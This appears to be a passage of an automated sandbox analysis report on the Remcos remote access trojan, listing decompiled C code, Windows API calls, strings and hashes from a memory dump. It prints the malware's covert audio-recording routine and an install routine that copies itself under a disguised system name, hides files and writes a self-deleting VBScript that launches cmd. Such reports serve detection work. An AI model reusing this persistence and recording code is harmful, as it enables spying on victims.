                      • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00416B6D
                      • SetEvent.KERNEL32 ref: 00416B8E
                      • WaitForSingleObject.KERNEL32(000001F4), ref: 00416B9F
                      • CloseHandle.KERNEL32 ref: 00416BAF
                      • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00416BD1
                      • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00416BDB
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                      • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                      • API String ID: 738084811-1354618412
                      • Opcode ID: d18acea8baca26a07247505f498dbd4065cb79cf5edc96b7751cc9421d022e83
                      • Instruction ID: 973dc57b0db8283a3ff3d0709b6d05c4eb7b4f2cac8df707c3dce394e9b06912
                      • Opcode Fuzzy Hash: d18acea8baca26a07247505f498dbd4065cb79cf5edc96b7751cc9421d022e83
                      • Instruction Fuzzy Hash: 755180716001086FD704BBB5DC92DFF3A6DDA41389B10413FF902A61E2EF799D8586AE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00401A64(WCHAR* __ecx, signed int __edx) {
                      				long _v8;
                      				void _v12;
                      				void _v16;
                      				void _v20;
                      				void _v24;
                      				void _v28;
                      				void _v32;
                      				signed int _t36;
                      				void** _t75;
                      				signed int _t80;
                      				void* _t81;
                      				signed int _t83;
                      
                      				_t75 = __edx;
                      				_t80 =  *0x46ba9a & 0x0000ffff;
                      				_t83 = ( *0x46baa6 & 0x0000ffff) * _t80;
                      				_v20 = 1;
                      				_v16 = 0x10;
                      				_v24 = _t83 *  *0x46ba9c >> 3;
                      				asm("cdq");
                      				_v28 = _t83 + (__edx & 0x00000007) >> 3;
                      				_t36 =  *(__edx + 4) * _t80;
                      				_v32 = _t36;
                      				_v12 = _t36 + 0x24;
                      				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
                      				if(_t81 != 0xffffffff) {
                      					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
                      					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
                      					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
                      					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
                      					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
                      					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
                      					WriteFile(_t81, 0x46ba9a, 2,  &_v8, 0);
                      					WriteFile(_t81, 0x46ba9c, 4,  &_v8, 0);
                      					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
                      					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
                      					WriteFile(_t81, 0x46baa6, 2,  &_v8, 0);
                      					WriteFile(_t81, "data", 4,  &_v8, 0);
                      					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
                      					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
                      					CloseHandle(_t81);
                      					return 1;
                      				}
                      				return 0;
                      			}
                      APIs
                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401ACC
                      • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AF3
                      • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B02
                      • WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B12
                      • WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B22
                      • WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B31
                      • WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B40
                      • WriteFile.KERNEL32(00000000,0046BA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B50
                      • WriteFile.KERNEL32(00000000,0046BA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B60
                      • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B6F
                      • WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B7E
                      • WriteFile.KERNEL32(00000000,0046BAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B8E
                      • WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B9E
                      • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401BAD
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$Write$Create
                      • String ID: RIFF$WAVE$data$fmt
                      • API String ID: 1602526932-4212202414
                      • Opcode ID: b88aaf6fd4ae18e9db3e7edb62172b1f03b106a838d8e35c764a4ab3da7406ab
                      • Instruction ID: 7cb0b37bd81af4d905286dd476bd08579b6e0b57ecfaa18f48c35616be89f383
                      • Opcode Fuzzy Hash: b88aaf6fd4ae18e9db3e7edb62172b1f03b106a838d8e35c764a4ab3da7406ab
                      • Instruction Fuzzy Hash: DE413DB1A50218BAE710DA918C86FFFBBBCDB45B50F500066FB04EA0C0D7B45A05DBA6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E0040A987(char __ecx, intOrPtr* __edx, WCHAR* _a4, char _a8, char _a12) {
                      				char _v9;
                      				int _v20;
                      				char _v44;
                      				char _v68;
                      				char _v92;
                      				char _v116;
                      				char _v140;
                      				char _v164;
                      				char _v188;
                      				char _v212;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				intOrPtr _t62;
                      				void* _t63;
                      				signed int _t67;
                      				signed int _t68;
                      				int _t70;
                      				void* _t79;
                      				void* _t91;
                      				void* _t92;
                      				int _t94;
                      				void* _t99;
                      				void* _t100;
                      				WCHAR* _t113;
                      				int _t115;
                      				intOrPtr _t118;
                      				WCHAR* _t123;
                      				int _t124;
                      				void* _t139;
                      				intOrPtr* _t152;
                      				int _t153;
                      				intOrPtr* _t207;
                      				int _t208;
                      				intOrPtr* _t235;
                      				void* _t236;
                      				void* _t239;
                      				void* _t249;
                      				void* _t250;
                      				intOrPtr _t254;
                      				void* _t257;
                      				void* _t259;
                      				intOrPtr* _t260;
                      
                      				_t235 = __edx;
                      				_v9 = __ecx;
                      				_t260 = __edx;
                      				_v20 = 0;
                      				_t257 = __edx + 2;
                      				do {
                      					_t62 =  *_t235;
                      					_t235 = _t235 + 2;
                      				} while (_t62 != 0);
                      				_t236 = _t235 - _t257;
                      				_t268 = _t236;
                      				if(_t236 == 0) {
                      					_t143 = _a4;
                      					_t238 = __ecx;
                      					_t63 = E0041805B( &_v92, __ecx, _t143);
                      					_t259 = 0x46c500;
                      					L00401EFA(0x46c500, _t238, _t260, _t63);
                      				} else {
                      					CreateDirectoryW(L00401EEB(0x46c530), 0);
                      					_t143 = _a4;
                      					_t139 = E004030A6(_t143,  &_v92, E00407514( &_v44, 0x46c530, _t268, "\\"), 0x46c530, _t268, _t143);
                      					_t259 = 0x46c500;
                      					L00401EFA(0x46c500, _t138, _t260, _t139);
                      					L00401EF0();
                      				}
                      				L00401EF0();
                      				_t152 = L00401EEB(_t259);
                      				_t67 = 0x46bb08;
                      				while(1) {
                      					_t239 =  *_t67;
                      					if(_t239 !=  *_t152) {
                      						break;
                      					}
                      					if(_t239 == 0) {
                      						L10:
                      						_t153 = 0;
                      						_t68 = 0;
                      						L12:
                      						if(_t68 != 0) {
                      							_t70 = CopyFileW("C:\Windows\SysWOW64\logagent.exe", L00401EEB(_t259), _t153);
                      							__eflags = _t70;
                      							if(_t70 != 0) {
                      								L23:
                      								E0040A896(0x46c4e8, L00401EEB(0x46c4e8));
                      								__eflags = _a8 - 1;
                      								_pop(_t157);
                      								if(__eflags != 0) {
                      									L28:
                      									E004030A6(_t143,  &_v92, E0040427F(_t143,  &_v68, E0043987F(_t143, _t157, __eflags, L"Temp")), _t259, __eflags, L"\\install.vbs");
                      									L00401EF0();
                      									E0040427F(_t143,  &_v44, L"WScript.Sleep 1000\n");
                      									E0040766C(_t143,  &_v44, _t259, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                      									__eflags = _a12 - 1;
                      									_t144 = "\n";
                      									if(__eflags == 0) {
                      										_t100 = E0040427F("\n",  &_v212, "C:\Windows\SysWOW64\logagent.exe");
                      										E00403311(E004030A6(_t144,  &_v68, E004030A6(_t144,  &_v116, E00403030( &_v140, E004030A6(_t144,  &_v164, E0040427F("\n",  &_v188, L"fso.DeleteFile "), _t259, __eflags, "\""), _t100), _t259, __eflags, "\""), _t259, __eflags, _t144));
                      										L00401EF0();
                      										L00401EF0();
                      										L00401EF0();
                      										L00401EF0();
                      										L00401EF0();
                      										L00401EF0();
                      									}
                      									_t79 = E0040427F(_t144,  &_v116, L"\"\"\", 0");
                      									E00403311(E004030A6(_t144,  &_v212, E00403030( &_v188, E00404429(_t144,  &_v164, E0040427F(_t144,  &_v68, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), __eflags, _t259), _t79), _t259, __eflags, _t144));
                      									L00401EF0();
                      									L00401EF0();
                      									L00401EF0();
                      									L00401EF0();
                      									L00401EF0();
                      									E0040766C(_t144,  &_v44, _t259, L"fso.DeleteFile(Wscript.ScriptFullName)");
                      									_t91 = L00401EEB( &_v92);
                      									_t92 = E00402489();
                      									_t94 = E00417947(L00401EEB( &_v44), _t92 + _t92, _t91, 0);
                      									__eflags = _t94;
                      									if(_t94 == 0) {
                      										L33:
                      										L00401EF0();
                      										return L00401EF0();
                      									} else {
                      										_t99 = ShellExecuteW(0, L"open", L00401EEB( &_v92), 0x45f724, 0x45f724, 0);
                      										__eflags = _t99 - 0x20;
                      										if(_t99 <= 0x20) {
                      											goto L33;
                      										}
                      										ExitProcess(0);
                      									}
                      								}
                      								_t113 = L00401EEB(_t259);
                      								_t143 = SetFileAttributesW;
                      								SetFileAttributesW(_t113, 7);
                      								_t249 = _t260 + 2;
                      								_t157 = 0;
                      								__eflags = 0;
                      								do {
                      									_t115 =  *_t260;
                      									_t260 = _t260 + 2;
                      									__eflags = _t115;
                      								} while (_t115 != 0);
                      								__eflags = _t260 - _t249;
                      								if(__eflags != 0) {
                      									_t157 = 0x46c530;
                      									SetFileAttributesW(L00401EEB(0x46c530), 7);
                      								}
                      								goto L28;
                      							}
                      							__eflags = _v9 - 0x36;
                      							if(_v9 == 0x36) {
                      								goto L23;
                      							}
                      							_t207 = _t260;
                      							_t250 = _t207 + 2;
                      							do {
                      								_t118 =  *_t207;
                      								_t207 = _t207 + 2;
                      								__eflags = _t118 - _v20;
                      							} while (_t118 != _v20);
                      							_t208 = _t207 - _t250;
                      							__eflags = _t208;
                      							_push(_t143);
                      							if(_t208 == 0) {
                      								L00401EFA(_t259, 0x36, _t260, E0041805B( &_v68, 0x36));
                      							} else {
                      								L00401EFA(_t259, _t128, _t260, E004030A6(_t143,  &_v140, E004030A6(_t143,  &_v116, E0041805B( &_v68, 0x36, _t260), _t259, __eflags, "\\"), _t259, __eflags));
                      								L00401EF0();
                      								L00401EF0();
                      							}
                      							L00401EF0();
                      							_t123 = L00401EEB(_t259);
                      							_t143 = 0x46bb08;
                      							_t124 = CopyFileW(0x46bb08, _t123, 0);
                      							__eflags = _t124;
                      							if(_t124 != 0) {
                      								goto L23;
                      							} else {
                      								L00409DC9(0x46bb08, _t259, 0x46bb08);
                      								return 0;
                      							}
                      						}
                      						E0040A896(0x46c4e8, L00401EEB(0x46c4e8));
                      						return 1;
                      					}
                      					_t254 =  *((intOrPtr*)(_t67 + 2));
                      					if(_t254 !=  *((intOrPtr*)(_t152 + 2))) {
                      						break;
                      					}
                      					_t67 = _t67 + 4;
                      					_t152 = _t152 + 4;
                      					if(_t254 != 0) {
                      						continue;
                      					}
                      					goto L10;
                      				}
                      				asm("sbb eax, eax");
                      				_t68 = _t67 | 0x00000001;
                      				_t153 = 0;
                      				__eflags = 0;
                      				goto L12;
                      			}
                      APIs
                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A9BF
                      • CopyFileW.KERNEL32(C:\Windows\SysWOW64\logagent.exe,00000000,00000000,00000000), ref: 0040AA8B
                      • CopyFileW.KERNEL32(C:\Windows\SysWOW64\logagent.exe,00000000,00000000,00000000), ref: 0040AB29
                        • Part of subcall function 0041805B: GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004181B2
                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AB6B
                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040AB90
                      • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040AD5B
                      • ExitProcess.KERNEL32 ref: 0040AD67
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.515009100.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 0000000E.00000002.515656834.000000000046F000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: File$AttributesCopy$CreateDirectoryExecuteExitLongNamePathProcessShell
                      • String ID: """, 0$6$C:\Windows\SysWOW64\logagent.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                      • API String ID: 4018752923-3679637522
                      • Opcode ID: 9e18b3c0e184d6d4754112488a75fef8ecf5ae8d24948dbe7ae8a1902eb8dbf7
                      • Instruction ID: 190cd27c0b7bf58ebe4b0d8389cb7e98ba8e890002f8b4040f3ff986190cfdad
                      • Opcode Fuzzy Hash: 9e18b3c0e184d6d4754112488a75fef8ecf5ae8d24948dbe7ae8a1902eb8dbf7
                      • Instruction Fuzzy Hash: C4A1637160020456CB28FBA5DC92AFF737AAF54344F54407FF806B61D2EE386E46C66A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 87%
                      			E004476AD(signed int _a4, signed int _a8) {
                      				signed int _v0;
                      				signed char _v5;
                      				intOrPtr _v8;
                      				signed char _v9;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				intOrPtr _v24;
                      				signed int _v44;
                      				signed int _v92;
                      				signed int _v128;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				void* __ebp;
                      				signed int _t116;
                      				signed int _t119;
                      				signed int _t120;
                      				signed int _t122;
                      				signed int _t123;
                      				signed int _t126;
                      				signed int _t127;
                      				signed int _t131;
                      				signed int _t133;
                      				signed int _t136;
                      				signed int _t138;
                      				signed int _t139;
                      				signed int _t142;
                      				void* _t143;
                      				signed int _t148;
                      				signed int* _t150;
                      				signed int* _t156;
                      				signed int _t163;
                      				signed int _t165;
                      				signed int _t167;
                      				intOrPtr _t168;
                      				signed int _t173;
                      				signed int _t175;
                      				signed int _t176;
                      				signed int _t180;
                      				signed int _t185;
                      				intOrPtr* _t186;
                      				signed int _t191;
                      				signed int _t196;
                      				signed int _t197;
                      				signed int _t204;
                      				intOrPtr* _t205;
                      				signed int _t214;
                      				signed int _t215;
                      				signed int _t217;
                      				signed int _t218;
                      				signed int _t220;
                      				signed int _t221;
                      				signed int _t223;
                      				intOrPtr _t225;
                      				void* _t231;
                      				signed int _t233;
                      				void* _t236;
                      				signed int _t237;
                      				signed int _t238;
                      				void* _t241;
                      				signed int _t244;
                      				signed int _t246;
                      				void* _t252;
                      				signed int _t253;
                      				signed int _t254;
                      				void* _t260;
                      				void* _t262;
                      				signed int _t263;
                      				intOrPtr* _t267;
                      				intOrPtr* _t271;
                      				signed int _t274;
                      				signed int _t276;
                      				signed int _t280;
                      				signed int _t282;
                      				void* _t283;
                      				void* _t284;
                      				void* _t285;
                      				signed int _t286;
                      				signed int _t288;
                      				signed int _t290;
                      				signed int _t291;
                      				signed int* _t292;
                      				signed int _t298;
                      				signed int _t299;
                      				CHAR* _t300;
                      				signed int _t302;
                      				signed int _t303;
                      				WCHAR* _t304;
                      				signed int _t305;
                      				signed int _t306;
                      				signed int* _t307;
                      				signed int _t308;
                      				signed int _t310;
                      				void* _t316;
                      				void* _t317;
                      				void* _t318;
                      				void* _t320;
                      				void* _t321;
                      				void* _t322;
                      				void* _t323;
                      
                      				_t217 = _a4;
                      				if(_t217 != 0) {
                      					_t286 = _t217;
                      					_t116 = L00434F60(_t217, 0x3d);
                      					_v16 = _t116;
                      					_t231 = _t285;
                      					__eflags = _t116;
                      					if(_t116 == 0) {
                      						L10:
                      						 *((intOrPtr*)(E0043A504())) = 0x16;
                      						goto L11;
                      					} else {
                      						__eflags = _t116 - _t217;
                      						if(_t116 == _t217) {
                      							goto L10;
                      						} else {
                      							__eflags =  *((char*)(_t116 + 1));
                      							_t298 =  *0x46b4d0; // 0x3029b80
                      							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
                      							_v5 = _t120;
                      							__eflags = _t298 -  *0x46b4dc; // 0x3029b80
                      							if(__eflags == 0) {
                      								L87();
                      								_t298 = _t120;
                      								_t120 = _v5;
                      								_t231 = _t298;
                      								 *0x46b4d0 = _t298;
                      							}
                      							_t218 = 0;
                      							__eflags = _t298;
                      							if(_t298 != 0) {
                      								L21:
                      								_t233 = _t286;
                      								_t122 = _v16 - _t233;
                      								_push(_t122);
                      								_push(_t233);
                      								L121();
                      								_v12 = _t122;
                      								__eflags = _t122;
                      								if(_t122 < 0) {
                      									L29:
                      									__eflags = _v5 - _t218;
                      									if(_v5 != _t218) {
                      										goto L12;
                      									} else {
                      										_t123 =  ~_t122;
                      										_v12 = _t123;
                      										_t27 = _t123 + 2; // 0x2
                      										_t236 = _t27;
                      										__eflags = _t236 - _t123;
                      										if(_t236 < _t123) {
                      											goto L11;
                      										} else {
                      											__eflags = _t236 - 0x3fffffff;
                      											if(_t236 >= 0x3fffffff) {
                      												goto L11;
                      											} else {
                      												_push(4);
                      												_push(_t236);
                      												_t299 = L00447D55(_t298);
                      												E004401F5(_t218);
                      												_t320 = _t320 + 0x10;
                      												__eflags = _t299;
                      												if(_t299 == 0) {
                      													goto L11;
                      												} else {
                      													_t237 = _v12;
                      													_t286 = _t218;
                      													_t126 = _a4;
                      													 *(_t299 + _t237 * 4) = _t126;
                      													 *(_t299 + 4 + _t237 * 4) = _t218;
                      													goto L34;
                      												}
                      											}
                      										}
                      									}
                      								} else {
                      									__eflags =  *_t298 - _t218;
                      									if( *_t298 == _t218) {
                      										goto L29;
                      									} else {
                      										E004401F5( *((intOrPtr*)(_t298 + _t122 * 4)));
                      										_t282 = _v12;
                      										__eflags = _v5 - _t218;
                      										if(_v5 != _t218) {
                      											while(1) {
                      												__eflags =  *(_t298 + _t282 * 4) - _t218;
                      												if( *(_t298 + _t282 * 4) == _t218) {
                      													break;
                      												}
                      												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
                      												_t282 = _t282 + 1;
                      												__eflags = _t282;
                      											}
                      											_push(4);
                      											_push(_t282);
                      											_t299 = L00447D55(_t298);
                      											E004401F5(_t218);
                      											_t320 = _t320 + 0x10;
                      											_t126 = _t286;
                      											__eflags = _t299;
                      											if(_t299 != 0) {
                      												L34:
                      												 *0x46b4d0 = _t299;
                      											}
                      										} else {
                      											_t126 = _a4;
                      											_t286 = _t218;
                      											 *(_t298 + _t282 * 4) = _t126;
                      										}
                      										__eflags = _a8 - _t218;
                      										if(_a8 == _t218) {
                      											goto L12;
                      										} else {
                      											_t238 = _t126;
                      											_t283 = _t238 + 1;
                      											do {
                      												_t127 =  *_t238;
                      												_t238 = _t238 + 1;
                      												__eflags = _t127;
                      											} while (_t127 != 0);
                      											_v12 = _t238 - _t283 + 2;
                      											_t300 = E0043F348(_t238 - _t283, _t238 - _t283 + 2, 1);
                      											_pop(_t241);
                      											__eflags = _t300;
                      											if(_t300 == 0) {
                      												L42:
                      												E004401F5(_t300);
                      												goto L12;
                      											} else {
                      												_t131 = E00441916(_t300, _v12, _a4);
                      												_t321 = _t320 + 0xc;
                      												__eflags = _t131;
                      												if(_t131 != 0) {
                      													_push(_t218);
                      													_push(_t218);
                      													_push(_t218);
                      													_push(_t218);
                      													_push(_t218);
                      													E0043698A();
                      													asm("int3");
                      													_t316 = _t321;
                      													_t322 = _t321 - 0xc;
                      													_push(_t218);
                      													_t220 = _v44;
                      													__eflags = _t220;
                      													if(_t220 != 0) {
                      														_push(_t300);
                      														_push(_t286);
                      														_push(0x3d);
                      														_t288 = _t220;
                      														_t133 = L00450FF7(_t241);
                      														_v20 = _t133;
                      														_t244 = _t220;
                      														__eflags = _t133;
                      														if(_t133 == 0) {
                      															L54:
                      															 *((intOrPtr*)(E0043A504())) = 0x16;
                      															goto L55;
                      														} else {
                      															__eflags = _t133 - _t220;
                      															if(_t133 == _t220) {
                      																goto L54;
                      															} else {
                      																_t302 =  *0x46b4d4; // 0x3029ce0
                      																_t221 = 0;
                      																__eflags =  *(_t133 + 2);
                      																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
                      																_v9 = _t246;
                      																__eflags = _t302 -  *0x46b4d8; // 0x3029fa0
                      																if(__eflags == 0) {
                      																	_push(_t302);
                      																	L104();
                      																	_t246 = _v9;
                      																	_t302 = _t133;
                      																	 *0x46b4d4 = _t302;
                      																}
                      																__eflags = _t302;
                      																if(_t302 != 0) {
                      																	L64:
                      																	_v20 = _v20 - _t288 >> 1;
                      																	_t138 = L00447CE8(_t288, _v20 - _t288 >> 1);
                      																	_v16 = _t138;
                      																	__eflags = _t138;
                      																	if(_t138 < 0) {
                      																		L72:
                      																		__eflags = _v9 - _t221;
                      																		if(_v9 != _t221) {
                      																			goto L56;
                      																		} else {
                      																			_t139 =  ~_t138;
                      																			_v16 = _t139;
                      																			_t72 = _t139 + 2; // 0x2
                      																			_t252 = _t72;
                      																			__eflags = _t252 - _t139;
                      																			if(_t252 < _t139) {
                      																				goto L55;
                      																			} else {
                      																				__eflags = _t252 - 0x3fffffff;
                      																				if(_t252 >= 0x3fffffff) {
                      																					goto L55;
                      																				} else {
                      																					_push(4);
                      																					_push(_t252);
                      																					_t303 = L00447D55(_t302);
                      																					E004401F5(_t221);
                      																					_t322 = _t322 + 0x10;
                      																					__eflags = _t303;
                      																					if(_t303 == 0) {
                      																						goto L55;
                      																					} else {
                      																						_t253 = _v16;
                      																						_t288 = _t221;
                      																						_t142 = _v0;
                      																						 *(_t303 + _t253 * 4) = _t142;
                      																						 *(_t303 + 4 + _t253 * 4) = _t221;
                      																						goto L77;
                      																					}
                      																				}
                      																			}
                      																		}
                      																	} else {
                      																		__eflags =  *_t302 - _t221;
                      																		if( *_t302 == _t221) {
                      																			goto L72;
                      																		} else {
                      																			E004401F5( *((intOrPtr*)(_t302 + _t138 * 4)));
                      																			_t276 = _v16;
                      																			__eflags = _v9 - _t221;
                      																			if(_v9 != _t221) {
                      																				while(1) {
                      																					__eflags =  *(_t302 + _t276 * 4) - _t221;
                      																					if( *(_t302 + _t276 * 4) == _t221) {
                      																						break;
                      																					}
                      																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
                      																					_t276 = _t276 + 1;
                      																					__eflags = _t276;
                      																				}
                      																				_push(4);
                      																				_push(_t276);
                      																				_t303 = L00447D55(_t302);
                      																				E004401F5(_t221);
                      																				_t322 = _t322 + 0x10;
                      																				_t142 = _t288;
                      																				__eflags = _t303;
                      																				if(_t303 != 0) {
                      																					L77:
                      																					 *0x46b4d4 = _t303;
                      																				}
                      																			} else {
                      																				_t142 = _v0;
                      																				_t288 = _t221;
                      																				 *(_t302 + _t276 * 4) = _t142;
                      																			}
                      																			__eflags = _a4 - _t221;
                      																			if(_a4 == _t221) {
                      																				goto L56;
                      																			} else {
                      																				_t254 = _t142;
                      																				_t81 = _t254 + 2; // 0x2
                      																				_t284 = _t81;
                      																				do {
                      																					_t143 =  *_t254;
                      																					_t254 = _t254 + 2;
                      																					__eflags = _t143 - _t221;
                      																				} while (_t143 != _t221);
                      																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
                      																				_v16 = _t82;
                      																				_t304 = E0043F348(_t254 - _t284 >> 1, _t82, 2);
                      																				_pop(_t258);
                      																				__eflags = _t304;
                      																				if(_t304 == 0) {
                      																					L85:
                      																					E004401F5(_t304);
                      																					goto L56;
                      																				} else {
                      																					_t148 = E004415D4(_t304, _v16, _v0);
                      																					_t323 = _t322 + 0xc;
                      																					__eflags = _t148;
                      																					if(_t148 != 0) {
                      																						_push(_t221);
                      																						_push(_t221);
                      																						_push(_t221);
                      																						_push(_t221);
                      																						_push(_t221);
                      																						E0043698A();
                      																						asm("int3");
                      																						_push(_t316);
                      																						_t317 = _t323;
                      																						_push(_t288);
                      																						_t290 = _v92;
                      																						__eflags = _t290;
                      																						if(_t290 != 0) {
                      																							_t260 = 0;
                      																							_t150 = _t290;
                      																							__eflags =  *_t290;
                      																							if( *_t290 != 0) {
                      																								do {
                      																									_t150 =  &(_t150[1]);
                      																									_t260 = _t260 + 1;
                      																									__eflags =  *_t150;
                      																								} while ( *_t150 != 0);
                      																							}
                      																							_t305 = E0043F348(_t260, _t260 + 1, 4);
                      																							_t262 = _t304;
                      																							__eflags = _t305;
                      																							if(_t305 == 0) {
                      																								L102:
                      																								E0043F949(_t221, _t284, _t290, _t305);
                      																								goto L103;
                      																							} else {
                      																								__eflags =  *_t290;
                      																								if( *_t290 == 0) {
                      																									L100:
                      																									E004401F5(0);
                      																									_t175 = _t305;
                      																									goto L101;
                      																								} else {
                      																									_push(_t221);
                      																									_t221 = _t305 - _t290;
                      																									__eflags = _t221;
                      																									do {
                      																										_t271 =  *_t290;
                      																										_t284 = _t271 + 1;
                      																										do {
                      																											_t176 =  *_t271;
                      																											_t271 = _t271 + 1;
                      																											__eflags = _t176;
                      																										} while (_t176 != 0);
                      																										_t262 = _t271 - _t284;
                      																										_v16 = _t262 + 1;
                      																										 *(_t221 + _t290) = E0043F348(_t262, _t262 + 1, 1);
                      																										E004401F5(0);
                      																										_t323 = _t323 + 0xc;
                      																										__eflags =  *(_t221 + _t290);
                      																										if( *(_t221 + _t290) == 0) {
                      																											goto L102;
                      																										} else {
                      																											_t180 = E00441916( *(_t221 + _t290), _v16,  *_t290);
                      																											_t323 = _t323 + 0xc;
                      																											__eflags = _t180;
                      																											if(_t180 != 0) {
                      																												L103:
                      																												_push(0);
                      																												_push(0);
                      																												_push(0);
                      																												_push(0);
                      																												_push(0);
                      																												E0043698A();
                      																												asm("int3");
                      																												_push(_t317);
                      																												_t318 = _t323;
                      																												_push(_t262);
                      																												_push(_t262);
                      																												_push(_t290);
                      																												_t291 = _v128;
                      																												__eflags = _t291;
                      																												if(_t291 != 0) {
                      																													_push(_t221);
                      																													_t223 = 0;
                      																													_t156 = _t291;
                      																													_t263 = 0;
                      																													_v20 = 0;
                      																													_push(_t305);
                      																													__eflags =  *_t291;
                      																													if( *_t291 != 0) {
                      																														do {
                      																															_t156 =  &(_t156[1]);
                      																															_t263 = _t263 + 1;
                      																															__eflags =  *_t156;
                      																														} while ( *_t156 != 0);
                      																													}
                      																													_t306 = E0043F348(_t263, _t263 + 1, 4);
                      																													__eflags = _t306;
                      																													if(_t306 == 0) {
                      																														L119:
                      																														E0043F949(_t223, _t284, _t291, _t306);
                      																														goto L120;
                      																													} else {
                      																														__eflags =  *_t291 - _t223;
                      																														if( *_t291 == _t223) {
                      																															L117:
                      																															E004401F5(_t223);
                      																															_t167 = _t306;
                      																															goto L118;
                      																														} else {
                      																															_t223 = _t306 - _t291;
                      																															__eflags = _t223;
                      																															do {
                      																																_t267 =  *_t291;
                      																																_t284 = _t267 + 2;
                      																																do {
                      																																	_t168 =  *_t267;
                      																																	_t267 = _t267 + 2;
                      																																	__eflags = _t168 - _v20;
                      																																} while (_t168 != _v20);
                      																																_v24 = (_t267 - _t284 >> 1) + 1;
                      																																 *(_t223 + _t291) = E0043F348(_t267 - _t284 >> 1, (_t267 - _t284 >> 1) + 1, 2);
                      																																E004401F5(0);
                      																																_t323 = _t323 + 0xc;
                      																																__eflags =  *(_t223 + _t291);
                      																																if( *(_t223 + _t291) == 0) {
                      																																	goto L119;
                      																																} else {
                      																																	_t173 = E004415D4( *(_t223 + _t291), _v24,  *_t291);
                      																																	_t323 = _t323 + 0xc;
                      																																	__eflags = _t173;
                      																																	if(_t173 != 0) {
                      																																		L120:
                      																																		_push(0);
                      																																		_push(0);
                      																																		_push(0);
                      																																		_push(0);
                      																																		_push(0);
                      																																		E0043698A();
                      																																		asm("int3");
                      																																		_push(_t318);
                      																																		_push(_t223);
                      																																		_push(_t306);
                      																																		_push(_t291);
                      																																		_t292 =  *0x46b4d0;
                      																																		_t307 = _t292;
                      																																		__eflags =  *_t292;
                      																																		if( *_t292 == 0) {
